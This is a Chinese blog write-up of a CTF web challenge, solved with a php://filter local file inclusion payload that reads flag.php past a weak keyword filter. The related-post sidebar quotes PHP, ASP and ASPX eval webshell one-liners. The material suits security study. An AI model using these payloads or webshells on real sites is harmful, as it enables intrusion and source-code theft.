2021-06-19

最新推荐文章于 2021-12-12 02:07:07 发布
最新推荐文章于 2021-12-12 02:07:07 发布
阅读量129 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZZZllllllxx/article/details/118055469
本文详细描述了一次极客大挑战中解决安全问题的过程。通过php伪协议和302重定向,作者发现了secr3t.php文件,并尝试访问flag.php。由于过滤机制,直接访问flag.php无效,于是构造了php伪协议payload成功解码获取了隐藏信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021/6/19
[极客大挑战 2019]Secret File
php伪协议
302转跳
打开之后页面没啥有用的信息去看源码
在这里插入图片描述
发现了Archive_room.php访问有一个
SECRET 点击发现是直接就转跳了想到bp抓包
于是抓包
在这里插入图片描述
发现 secr3t.php
去访问发现一段源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

一开始考虑直接访问flag.php,但是发现查看不了flag
又看上边过滤了很多,于是又想到了php伪协议
构造payload:http://1ad1ad22-079c-4897-8eb9-2ebfe14abc2b.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
果然

在这里插入图片描述
解码
在这里插入图片描述

BUUCTF刷题系列
qq_45655564的博客
07-11 582
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
2021-06-19, OV9281规格书和初始代码
舜雨电子施先生的博客
06-19 3483
@MMSYDZ OV9281摄像头模组规格书,引脚定义 # 初始代码: @@ R1280x800 RAW10 120fps MIPI_2lane c0 0103 01 c0 0302 32 c0 030d 50 c0 030e 02 c0 3001 00 c0 3004 00 c0 3005 00 c0 3006 04 c0 3011 0a c0 3013 18 c0 301c f0 c0 3022 01 c0 3030 10 c0 3039 32 c0 303a 00 c0 3500 00 c0 3501
BUUCTF-Secret File
z1moq的博客
09-06 539
Secret 意为秘密,可知我们需要在网页中寻找到隐藏的flag文件 启动环境打开靶机 直接查看源码,发现一个文件 打开后点击 secret 但是会直接跳转到 end.php 并且提示查阅结束,说明页面跳转过快,需要手动抓放包来查看 经过拦截显示出隐藏 php 文件,访问后出现源码 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file
【BUUCTF】[极客大挑战 2019] Secret File Writeup
algae
08-22 756
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stris...
WEB 渗透题(一)
0xac001d09
12-06 3980
[ACTF2020 新生赛]Include --文件包含 思路 burp 抓包,发现文件名有点问题。题目和网址的 file 参数,提示这是文件包含的题。 GET /?file=flag.php HTTP/1.1 Host: 9b09eb46-2433-4403-b582-c5ee23d12378.node4.buuoj.cn:81 因此可以构造文件名发包 file=php://filter/read=convert.base64-encode/resource=flag.php GET /?file=ph
BUUCTF刷题[Secret File]&[LoveSQL]&[Ping Ping Ping]
Pysnow's Blog
12-12 271
[极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping
2021-06-30
perfect_ch的博客
06-30 3299
目标检测网络构成部分: detector=backbone + neck + head backbone部分的网络就是负责从图像中提取特征。 neck是放在backbone和head之间的,是为了更好的利用backbone提取的特征。 head这一部分的作用就是用于分类+定位。 backbone: VGG ResNet (ResNet18, 50, 100) ResNext DenseNet SqueezeNet Darknet (Darknet19,53) MobileNet ShuffleNe
app-privacy-report-2021-06-16-15-19.json
08-16
app-privacy-report-2021-06-16-15-19.json
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建
04-13
标题中的“Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建”暗示了这是一个关于自动化工作流程的项目,具体是针对构建和触发工具链的设置。在IT行业中,Pipeline通常指的是CI/CD(持续集成/持续部署)流程...
WebIDE-UISimpleTC-2021-04-06T06-19-20.427Z-github:为工具链创建
04-06
【标题】"WebIDE-UISimpleTC-2021-04-06T06-19-20.427Z-github:为工具链创建"揭示了一个项目,它涉及到Web集成开发环境(IDE)的用户界面(UI)简单测试用例的创建,且与GitHub有关。这个项目可能是一个开源项目,...
mysql源码安装
热门推荐
zengzehui的专栏
10-03 73万+
1、安装依赖            在安装mysql之前需要安装的依赖有make、bison、gcc-c++、cmake、ncurses            以上下载地址如下:             make编译器下载地址:http://www.gnu.org/software/make/             bison下载地址:http://www.gnu.org/softwar
mysql数据库反弹端口连接提权
xiaotu0821的博客
11-12 7万+
Mysql数据库反弹端口连接提权 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
[极客大挑战 2019]Secret File
怪味巧克力的博客
07-11 630
0x01 进入页面如下 看不到什么东西,所以查看源码 源码中发现有一个链接到另一个页面,原页面为黑色看不到链接,所以我们转到链接给的页面 有一个按钮,点击看看 发现点击之后直接跳到了end.php页面,查看源码也没有什么有用的东西,应该是时间过短然后就跳转,所以我们用抓包截断一下,发现结果如下 验证了我的想法,存在这个页面,直接进去看看 0x02 <html> <title>secret</title> <meta charset="UT
2021-10-17
ZZZllllllxx的博客
10-17 1361
陇剑杯wp 记得住的一些题目 1. 打开之后发现基本都是404 寻找200的发现www.zip 2. 这题当时先注意到题目为jwt,去网上搜索发现他就是一种认证方式,所以答案就是jwt 插一段知识点 Token的定义:Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。 使用Token的目的:Token的目的是为了减轻服务器的压力,减少频繁的查询
2021-09-15
ZZZllllllxx的博客
09-22 1276
[RoarCTF 2019]Easy Calc 1 打开之后先看了眼源码 发现一句注释 还有calc.php 去查了一下WAF 英文:Web Application Firewall,简称: WAF 通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品 与传统防火墙不同,WAF工作在应用层 WAF对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,从而对各类网站站点进行有效防护。 然后访问calc.php发现了源码 &lt
2021-06-15
ZZZllllllxx的博客
06-19 1059
2021/6/15 bugku web30 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 这题也有关php伪协议看到了file_get_contents这
2021-09-14
ZZZllllllxx的博客
09-15 604
[极客大挑战 2019]Upload 常见upload检查内容有,后缀名、content-type、文件头的部分内容 经常用到的一句话木马有 php: <?php @eval($_POST['21']);?> asp: <%eval request (“21”)%> aspx: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“21”],“unsafe”);%> 试图直接上传php一句话木马,但是并未
Eclipse 2021-06 汉化工具包免费下载指南
资源摘要信息:"BabelLanguagePack-tools.tm-zh_4.20.0.v***-19.zip文件包是针对Eclipse 2021-06版本的汉化包,用于将Eclipse IDE的各个模块界面从英文翻译成中文,使之更适合中文用户使用。汉化包是免费下载资源,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值